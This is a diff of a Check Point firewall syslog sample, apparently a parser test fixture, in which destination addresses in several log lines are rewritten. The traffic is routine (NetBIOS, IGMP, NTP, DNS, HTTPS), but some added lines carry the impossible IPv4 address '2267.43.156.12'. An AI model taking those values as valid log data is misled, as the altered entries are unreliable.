 <134>1 2020-03-29T20:17:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810274,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:17:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810275,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T20:18:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810278,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"2"; service_id:"igmp"; src:"192.168.1.1"]
-<134>1 2020-03-29T20:18:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810279,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:18:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810278,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"2"; service_id:"igmp"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:18:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810279,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:18:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810281,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.117"]
-<134>1 2020-03-29T20:18:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81028b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:18:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81028b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:18:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81028f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36815"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T20:18:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810292,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"9999"; service:"9999"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:18:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102af,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51542"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -4997,7 +4997,7 @@
 <134>1 2020-03-29T20:19:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102b8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51544"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:19:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102b8,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51545"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:19:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102b9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49040"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T20:19:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102be,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64962"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T20:19:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102be,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64962"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:19:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102be,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40990"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10447"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T20:19:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102be,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56594"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:19:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102be,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36230"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10448"; xlatesrc:"0.0.0.0"]
@@ -5006,8 +5006,8 @@
 <134>1 2020-03-29T20:19:14Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102c4,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T20:19:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102c4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.196"]
 <134>1 2020-03-29T20:19:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102c4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T20:19:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102ca,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
-<134>1 2020-03-29T20:19:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102ca,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:19:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102ca,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:19:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102ca,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:19:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102cc,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51547"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:19:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102cc,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51548"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:19:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102eb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35842"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
@@ -5017,8 +5017,8 @@
 <134>1 2020-03-29T20:19:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102eb,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52314"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
